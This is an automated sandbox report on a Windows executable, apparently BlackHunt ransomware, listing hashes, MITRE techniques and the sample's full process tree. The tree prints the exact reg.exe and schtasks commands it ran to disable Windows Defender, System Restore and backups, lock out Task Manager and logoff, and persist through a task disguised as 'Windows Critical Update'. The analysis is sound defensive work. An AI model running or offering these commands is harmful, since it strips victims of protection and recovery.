dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de

Analysis

max time kernel
212s
max time network
205s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2024 01:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Size

707KB
MD5

a685c07cbb66d303cbb4d269b4a78a6d
SHA1

a1dd6d83271043f8e2b6bd646faaa8aab137f798
SHA256

dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de
SHA512

b5884c77dea9d11118132c8a66fef87661bc0173bab720e13a1d60262a27944ae9fb2c7bd9bdd6995392da2ad3f6271d8892464fb60f65ec7bc08d22b1e71630
SSDEEP

6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1u82vnh:6uaTmkZJ+naie5OTamgEoKxLWNIh

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4400	schtasks.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeRestorePrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeBackupPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeTakeOwnershipPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeAuditPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeSecurityPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
Token: SeIncBasePriorityPrivilege	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 908 wrote to memory of 2856	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	89
PID 908 wrote to memory of 2856	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	89
PID 908 wrote to memory of 728	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	91
PID 908 wrote to memory of 728	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	91
PID 908 wrote to memory of 436	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	93
PID 908 wrote to memory of 436	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	93
PID 908 wrote to memory of 2484	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	95
PID 908 wrote to memory of 2484	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	95
PID 2856 wrote to memory of 1860	2856	cmd.exe	97
PID 2856 wrote to memory of 1860	2856	cmd.exe	97
PID 908 wrote to memory of 2656	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	98
PID 908 wrote to memory of 2656	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	98
PID 728 wrote to memory of 668	728	cmd.exe	100
PID 728 wrote to memory of 668	728	cmd.exe	100
PID 436 wrote to memory of 3500	436	cmd.exe	101
PID 436 wrote to memory of 3500	436	cmd.exe	101
PID 2484 wrote to memory of 4476	2484	cmd.exe	102
PID 2484 wrote to memory of 4476	2484	cmd.exe	102
PID 2656 wrote to memory of 3412	2656	cmd.exe	103
PID 2656 wrote to memory of 3412	2656	cmd.exe	103
PID 908 wrote to memory of 4964	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	105
PID 908 wrote to memory of 4964	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	105
PID 908 wrote to memory of 2516	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	107
PID 908 wrote to memory of 2516	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	107
PID 908 wrote to memory of 4132	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	109
PID 908 wrote to memory of 4132	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	109
PID 908 wrote to memory of 116	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	111
PID 908 wrote to memory of 116	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	111
PID 908 wrote to memory of 4960	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	113
PID 908 wrote to memory of 4960	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	113
PID 4964 wrote to memory of 1012	4964	cmd.exe	115
PID 4964 wrote to memory of 1012	4964	cmd.exe	115
PID 908 wrote to memory of 992	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	116
PID 908 wrote to memory of 992	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	116
PID 908 wrote to memory of 4404	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	129
PID 908 wrote to memory of 4404	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	129
PID 908 wrote to memory of 936	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	124
PID 908 wrote to memory of 936	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	124
PID 2516 wrote to memory of 2488	2516	cmd.exe	118
PID 2516 wrote to memory of 2488	2516	cmd.exe	118
PID 908 wrote to memory of 3540	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	121
PID 908 wrote to memory of 3540	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	121
PID 4132 wrote to memory of 3236	4132	cmd.exe	123
PID 4132 wrote to memory of 3236	4132	cmd.exe	123
PID 908 wrote to memory of 4328	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	125
PID 908 wrote to memory of 4328	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	125
PID 116 wrote to memory of 1372	116	cmd.exe	126
PID 116 wrote to memory of 1372	116	cmd.exe	126
PID 4960 wrote to memory of 4944	4960	cmd.exe	128
PID 4960 wrote to memory of 4944	4960	cmd.exe	128
PID 992 wrote to memory of 404	992	cmd.exe	130
PID 992 wrote to memory of 404	992	cmd.exe	130
PID 908 wrote to memory of 904	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	131
PID 908 wrote to memory of 904	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	131
PID 936 wrote to memory of 2676	936	cmd.exe	133
PID 936 wrote to memory of 2676	936	cmd.exe	133
PID 3540 wrote to memory of 1768	3540	cmd.exe	134
PID 3540 wrote to memory of 1768	3540	cmd.exe	134
PID 4404 wrote to memory of 4324	4404	cmd.exe	135
PID 4404 wrote to memory of 4324	4404	cmd.exe	135
PID 4328 wrote to memory of 4304	4328	cmd.exe	136
PID 4328 wrote to memory of 4304	4328	cmd.exe	136
PID 908 wrote to memory of 2320	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	137
PID 908 wrote to memory of 2320	908	dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe	137

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe
"C:\Users\Admin\AppData\Local\Temp\dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    3⤵
    - Modifies registry class
    PID:1860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:728
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:668
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    3⤵
    - Modifies registry class
    PID:3500
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2484
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:4476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    3⤵
    - Adds Run key to start application
    PID:3412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:1012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    3⤵
    PID:3236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    3⤵
    PID:1372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    3⤵
    PID:4944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    3⤵
    PID:404
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3540
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    3⤵
    PID:1768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    3⤵
    PID:2676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    3⤵
    PID:4304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4404
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    3⤵
    PID:4324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  2⤵
  PID:904
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    3⤵
    PID:2912
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  2⤵
  PID:2320
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    3⤵
    PID:1508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:1484
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:3356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  2⤵
  PID:1140
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    3⤵
    PID:3104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:396
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:4820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  2⤵
  PID:4616
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    3⤵
    PID:468
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  2⤵
  PID:3228
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    3⤵
    PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  2⤵
  PID:184
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    3⤵
    PID:4984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  2⤵
  PID:3684
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    3⤵
    PID:4496
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:5048
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:1716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:4432
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:2308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:2828
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:3412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  2⤵
  PID:2784
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    3⤵
    PID:3288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  2⤵
  PID:1860
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:2028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe" /F
  2⤵
  PID:4472
- - C:\Windows\system32\schtasks.exe
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\dd53567c7686d6cb2352cd679b7602e708e8365fbb8be1f53bc22f25332dc7de.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4400